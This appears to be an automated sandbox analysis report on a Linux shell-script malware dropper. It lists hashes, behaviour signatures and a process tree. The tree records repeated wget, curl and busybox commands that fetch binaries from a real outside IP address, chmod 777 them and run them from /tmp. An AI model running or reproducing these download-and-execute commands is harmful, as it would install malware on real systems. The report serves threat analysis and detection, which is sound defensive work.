Analysis
-
max time kernel
9s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1531 chmod 1615 chmod 1573 chmod 1567 chmod 1591 chmod 1633 chmod 1651 chmod 1561 chmod 1537 chmod 1549 chmod 1597 chmod 1609 chmod 1627 chmod 1639 chmod 1645 chmod 1519 chmod 1585 chmod 1675 chmod 1543 chmod 1603 chmod 1681 chmod 1525 chmod 1579 chmod 1621 chmod 1555 chmod 1663 chmod 1669 chmod 1657 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 1520 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 1526 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 1532 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 1538 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 1544 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 1550 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 1556 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 1562 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 1568 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 1574 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 1580 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 1586 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 1592 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 1598 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 1604 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 1610 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 1616 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 1622 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 1628 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 1634 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 1640 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 1646 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 1652 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 1658 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 1664 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 1670 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 1676 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 1682 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl
Processes
-
/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh1⤵PID:1510
-
/bin/rm/bin/rm bins.sh2⤵PID:1511
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1512
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1515
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1524
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1530
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1536
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1542
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1548
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1554
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1560
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1566
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1572
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1578
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1584
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1590
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1596
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1602
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1608
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1614
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1620
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1626
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1632
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1638
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1644
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Writes file to tmp directory
PID:1649
-
-
